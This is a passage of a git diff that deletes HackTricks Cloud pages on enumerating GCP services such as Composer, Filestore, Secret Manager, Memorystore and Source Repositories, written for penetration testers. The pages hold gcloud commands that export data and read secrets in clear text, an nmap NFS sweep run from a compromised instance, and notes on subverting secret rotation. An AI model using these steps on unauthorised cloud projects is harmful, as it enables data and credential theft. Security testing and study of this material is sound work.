-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md deleted file mode 100644 index f238feb32..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - Composer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get envs info -gcloud composer environments list --locations -gcloud composer environments describe --location - -# Get list of dags -gcloud composer environments storage dags list --environment --location -# Download dags code -mkdir /tmp/dags -gcloud composer environments storage dags export --environment --location --destination /tmp/dags - -# List Data from composer -gcloud composer environments storage data list --environment --location -# Download data -mkdir /tmp/data -gcloud composer environments storage data export --environment --location --destination /tmp/data - -# List Plugins from composer -gcloud composer environments storage plugins list --environment --location -# Download plugins -mkdir /tmp/plugins -gcloud composer environments storage data export --environment --location --destination /tmp/plugins -``` -{% endcode %} - -### Privesc - -In the following page you can check how to **abuse composer permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %} -[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md deleted file mode 100644 index 136c2dcce..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - DNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCP - Cloud DNS - -Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service. - -```bash -# This will usually error if DNS service isn't configured in the project -gcloud dns project-info describe - -# Get DNS zones & records -gcloud dns managed-zones list -gcloud dns managed-zones describe -gcloud dns record-sets list --zone # Get record of the zone - -# Policies -## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks. -gcloud dns response-policies list -## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to. -gcloud dns policies list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md deleted file mode 100644 index d60c12b00..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Filestore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases. - -You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info. - -### Connections - -When creating a Filestore instance it's possible to **select the network where it's going to be accessible**. - -Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.** - -It can also be accessible via a **Private Service Access Connection:** - -* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL. -* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**. -* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision. -* The VPC peering will import new routes to your VPC - -### Backups - -It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**. - -### Encryption - -By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**. - -### Enumeration - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. - -{% code overflow="wrap" %} -```bash -# Instances -gcloud filestore instances list # Check the IP address -gcloud filestore instances describe --zone # Check IP and access restrictions - -# Backups -gcloud filestore backups list -gcloud filestore backups describe --region - -# Search for NFS shares in a VPC subnet -sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20 -``` -{% endcode %} - -{% hint style="danger" %} -Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\ -So you might need to **enumerate VPC peers** to also run nmap over those network ranges. - -{% code overflow="wrap" %} -```bash -# Get peerings -gcloud compute networks peerings list -# Get routes imported from a peering -gcloud compute networks peerings list-routes --network= --region= --direction=INCOMING -``` -{% endcode %} -{% endhint %} - -### Privilege Escalation & Post Exploitation - -There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges: - -{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %} -[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md deleted file mode 100644 index 4eb8b93c3..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md +++ /dev/null @@ -1,43 +0,0 @@ -# GCP - Firestore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/) - -Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions. - -```bash -gcloud firestore indexes composite list -gcloud firestore indexes composite describe -gcloud firestore indexes fields list -gcloud firestore indexes fields describe -gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md deleted file mode 100644 index 169225779..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Memorystore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Memorystore - -Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more. - -```bash -# Memcache -gcloud memcache instances list --region -gcloud memcache instances describe --region -# You should try to connect to the memcache instances to access the data - -# Redis -gcloud redis instances list --region -gcloud redis instances describe --region -gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md deleted file mode 100644 index d19210668..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# GCP - Monitoring Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment: - -### Policies - -Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS). - -### Dashboards - -Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution. - -### Channels - -Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more. - -Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**. - -### Snoozers - -A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get policies -gcloud alpha monitoring policies list -gcloud alpha monitoring policies describe - -# Get dashboards -gcloud monitoring dashboards list -gcloud monitoring dashboards describe - -# Get snoozers -gcloud monitoring snoozes list -gcloud monitoring snoozes describe - -# Get Channels -gcloud alpha monitoring channels list -gcloud alpha monitoring channels describe -``` -{% endcode %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %} -[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md deleted file mode 100644 index 87ea24f72..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Secrets Manager Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secret Manager - -Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data. - -A secret can have **different versions storing different data**. - -Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret. - -Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**. - -It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**. - -### Enumeration - -```bash -# First, list the entries -gcloud secrets list -gcloud secrets get-iam-policy - -# Then, pull the clear-text of any version of any secret -gcloud secrets versions list -gcloud secrets versions access 1 --secret="" -``` - -### Privilege Escalation - -In the following page you can check how to **abuse secretmanager permissions to escalate privileges.** - -{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %} -[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md deleted file mode 100644 index 764278cea..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md +++ /dev/null @@ -1,95 +0,0 @@ -# GCP - Source Repositories Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code. - -Key features of Cloud Source Repositories include: - -1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows. -2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment. -3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles. -4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices. -5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews. -6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories. - -### OffSec information - -* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background. -* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**. -* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms). -* It's possible to **code & debug from inside GCP**. -* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled. - -### Open In Cloud Shell - -It's possible to open the repository in Cloud Shell, a prompt like this one will appear: - -
- -This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised). - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Repos enumeration -gcloud source repos list #Get names and URLs -gcloud source repos describe -gcloud source repos get-iam-policy - -# gcloud repo clone -gcloud source repos clone -gcloud source repos get-iam-policy -... git add & git commit -m ... -git push --set-upstream origin master -git push -u origin master - -# Access via git -## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command) -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -git add, commit, push... -``` -{% endcode %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %} -[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %} -[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md deleted file mode 100644 index 7f6921598..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - Spanner Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/) - -Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability. - -```bash -# Cloud Spanner -## Instances -gcloud spanner instances list -gcloud spanner instances describe -gcloud spanner instances get-iam-policy - -## Databases -gcloud spanner databases list --instance -gcloud spanner databases describe --instance -gcloud spanner databases get-iam-policy --instance -gcloud spanner databases execute-sql --instance --sql - -## Backups -gcloud spanner backups list --instance -gcloud spanner backups get-iam-policy --instance - -## Instance Configs -gcloud spanner instance-configs list -gcloud spanner instance-configs describe -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md deleted file mode 100644 index 1e9390a4e..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md +++ /dev/null @@ -1,59 +0,0 @@ -# GCP - Stackdriver Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
